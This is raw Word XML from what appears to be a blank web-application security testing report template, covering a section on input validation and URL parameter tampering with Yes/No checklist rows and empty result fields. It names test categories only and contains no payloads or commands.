w:rsidRPr="00C747D8"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 Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DED0631" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRDefault="00A83ADC" w:rsidP="00BA2FD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7E9E102" w14:textId="77777777" w:rsidR="00BA2FD3" w:rsidRDefault="00BA2FD3" w:rsidP="00BA2FD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4E0AEE9" w14:textId="77777777" w:rsidR="00BA2FD3" w:rsidRDefault="00BA2FD3" w:rsidP="00BA2FD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BFF9B3B" w14:textId="77777777" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="00BA2FD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DA48F8E" w14:textId="77777777" w:rsidR="00837168" w:rsidRPr="00C747D8" w:rsidRDefault="00837168" w:rsidP="00BA2FD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83ADC" w:rsidRPr="00C747D8" w14:paraId="7F1B6A6B" w14:textId="77777777" w:rsidTr="00837168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63034C4B" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC" w:rsidP="0083716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47D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502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1092CCB7" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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AC4386F" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="96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4B5DDC2" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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0091073" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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6C8F5BB" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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687B443" w14:textId="77777777" w:rsidR="00A83ADC" w:rsidRPr="00C747D8" w:rsidRDefault="00A83ADC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3B59019C" w14:textId="77777777" w:rsidR="00851302" w:rsidRPr="00A51A96" w:rsidRDefault="00851302" w:rsidP="00851302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1302" w14:paraId="66D00FEE" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="609F9D47" w14:textId="77777777" w:rsidR="00851302" w:rsidRDefault="00851302" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6661A44D" w14:textId="77777777" w:rsidR="00851302" w:rsidRDefault="00851302" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4AE9134F" w14:textId="77777777" w:rsidR="00851302" w:rsidRDefault="00851302" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A96A8C5" w14:textId="77777777" w:rsidR="00851302" w:rsidRDefault="00851302" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B99FFA5" w14:textId="77777777" w:rsidR="00851302" w:rsidRDefault="00851302" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="152F1D9D" w14:textId="77777777" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66B679F7" w14:textId="77777777" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0942DEB6" w14:textId="77777777" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B6E3A85" w14:textId="77777777" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D6722FF" w14:textId="77777777" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="092B8D15" w14:textId="77777777" w:rsidR="00837168" w:rsidRDefault="00837168" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64C37BFD" w14:textId="77777777" w:rsidR="00A273FD" w:rsidRDefault="00A273FD" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38511C26" w14:textId="4FAC9512" w:rsidR="0006716B" w:rsidRDefault="0006716B" w:rsidP="0006716B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="0006716B">
        <w:lastRenderedPageBreak/>
        <w:t>Test 6: Evaluate Input Validation Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D698D7D" w14:textId="718FE500" w:rsidR="00851302" w:rsidRPr="002A2FB8" w:rsidRDefault="00213E7C" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A2FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>[*</w:t>
      </w:r>
      <w:r w:rsidR="00B20EB0" w:rsidRPr="002A2FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">This section will </w:t>
      </w:r>
      <w:r w:rsidR="002A2FB8" w:rsidRPr="002A2FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>allow you to create</w:t>
      </w:r>
      <w:r w:rsidR="00964A61" w:rsidRPr="002A2FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> reports </w:t>
      </w:r>
      <w:r w:rsidR="002A2FB8" w:rsidRPr="002A2FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidR="00964A61" w:rsidRPr="002A2FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> testing </w:t>
      </w:r>
      <w:r w:rsidR="00B20EB0" w:rsidRPr="002A2FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>input validation</w:t>
      </w:r>
      <w:r w:rsidR="00964A61" w:rsidRPr="002A2FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> flaws</w:t>
      </w:r>
      <w:r w:rsidR="00B20EB0" w:rsidRPr="002A2FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00964A61" w:rsidRPr="002A2FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>determine if the application effectively sanitizes and validates inputs before processing</w:t>
      </w:r>
      <w:r w:rsidR="005B5AAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B20EB0" w:rsidRPr="002A2FB8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735910DA" w14:textId="77777777" w:rsidR="00B20EB0" w:rsidRDefault="00B20EB0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8156B9" w:rsidRPr="00A51A96" w14:paraId="2243236C" w14:textId="77777777" w:rsidTr="00430DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3735B3E5" w14:textId="0557BCAF" w:rsidR="008156B9" w:rsidRPr="003C713F" w:rsidRDefault="008156B9" w:rsidP="00725128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6.1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045D29" w:rsidRPr="00045D29">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for URL Parameter Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ADE19FF" w14:textId="77777777" w:rsidR="003F0397" w:rsidRPr="008161A3" w:rsidRDefault="003F0397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2034"/>
        <w:gridCol w:w="2535"/>
        <w:gridCol w:w="2437"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B34276" w:rsidRPr="00B34276" w14:paraId="25191F10" w14:textId="77777777" w:rsidTr="008161A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3F0ECFF" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276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1CC0A225" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B3427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34276" w:rsidRPr="00B34276" w14:paraId="474500D1" w14:textId="77777777" w:rsidTr="008161A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FC97670" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276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7ED1876B" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B3427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34276" w:rsidRPr="00B34276" w14:paraId="2ECEC7A5" w14:textId="77777777" w:rsidTr="008161A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D3D2FF6" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276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6F65C8A1" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B3427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34276" w:rsidRPr="00B34276" w14:paraId="42FE761C" w14:textId="77777777" w:rsidTr="008161A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DCDC1DC" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276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Host Web Server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3B229D27" w14:textId="77777777" w:rsidR="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B3427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992E23F" w14:textId="77777777" w:rsidR="000938D4" w:rsidRPr="00B34276" w:rsidRDefault="000938D4" w:rsidP="00B3427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34276" w:rsidRPr="00B34276" w14:paraId="128E8E29" w14:textId="77777777" w:rsidTr="008161A3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4388" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3705E73D" w14:textId="3D6F5DD6" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276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Modified </w:t>
            </w:r>
            <w:r w:rsidR="00EC6D4B" w:rsidRPr="00B34276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URL</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34276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: Access to a Host Web Server Successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="253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884EB8B" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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B34276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243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E4D3247" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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B34276">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B34276" w:rsidRPr="00B34276" w14:paraId="53DF6593" w14:textId="77777777" w:rsidTr="008161A3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4388" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01F06F80" w14:textId="3D15A051" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276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Added Different Values and </w:t>
            </w:r>
            <w:r w:rsidR="00EC6D4B" w:rsidRPr="00B34276">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Manipulated Different</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34276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Parts of the Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="253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FF2223D" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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B34276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243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7188CD4" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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B34276">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B34276" w:rsidRPr="00B34276" w14:paraId="62E97B89" w14:textId="77777777" w:rsidTr="008161A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C4899F6" w14:textId="341C298B" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276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Test Results for </w:t>
            </w:r>
            <w:r w:rsidR="00DD483A" w:rsidRPr="00B34276">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Modified</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34276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URL Parameters of the Website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484738E0" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="97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F5DC04A" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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AA6CBB1" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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BE14C65" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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D3CABB6" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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B944A0B" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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34276" w:rsidRPr="00B34276" w14:paraId="5E7AD7F9" w14:textId="77777777" w:rsidTr="008161A3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4388" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3235140E" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Tested D</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34276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irectories and File Extensions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="253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94F3C65" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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B34276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243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FCCCA54" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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B34276">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B34276" w:rsidRPr="00B34276" w14:paraId="44A02A7E" w14:textId="77777777" w:rsidTr="008161A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9BC5508" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276"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 Information from the above Test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3916EB20" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="98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F46EE96" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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F3BC0AB" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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25B213C" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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D16CEB8" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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F052D1B" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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34276" w:rsidRPr="00B34276" w14:paraId="6119EFF6" w14:textId="77777777" w:rsidTr="008161A3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4388" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F8AFAC4" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Tested Using Different Strings or Characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="253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1C306A0" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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B34276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243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1E1DE4C" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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B34276">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B34276" w:rsidRPr="00B34276" w14:paraId="13C6C336" w14:textId="77777777" w:rsidTr="008161A3">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4388" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B178EDA" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Access to Unauthorized Parts of a Site Successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="253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1D01CE9" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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B34276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243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7F1D6B5" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B34276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B34276">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B34276" w:rsidRPr="00B34276" w14:paraId="1B22F788" w14:textId="77777777" w:rsidTr="008161A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B3B9FFF" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276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Scripts Sent to the URL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4975C803" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="102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686F4C7" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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2696064" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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FA3BDF5" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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7BB53D8" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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88C5843" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B3427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34276" w:rsidRPr="00B34276" w14:paraId="432FB190" w14:textId="77777777" w:rsidTr="008161A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77ED32E" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276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Hidden Files</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34276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and Other </w:t>
            </w:r>
            <w:r w:rsidRPr="00B34276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Information</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34276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</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34276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Revealed o</w:t>
            </w:r>
            <w:r w:rsidRPr="00B34276">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>n the Host Server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47785D15" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="99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F97D281" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="99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E73A3F0" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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564F872" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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D9BE11E" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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017FC1D" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B3427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34276" w:rsidRPr="00B34276" w14:paraId="0104FF60" w14:textId="77777777" w:rsidTr="008161A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7BBB0AA" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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B34276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Manipulated URL of the Host Website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16752AF3" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="100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7FD60CE" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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E777EFA" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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94F02E2" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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72E4536" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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521E96F" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00B3427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34276" w:rsidRPr="00B34276" w14:paraId="5D4F35B4" w14:textId="77777777" w:rsidTr="008161A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7C5B442" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="008161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34276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36A10C2A" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="101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B5C716F" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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478A8C9" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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3EFEB5B" w14:textId="77777777" w:rsidR="00B34276" w:rsidRPr="00B34276" w:rsidRDefault="00B34276" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
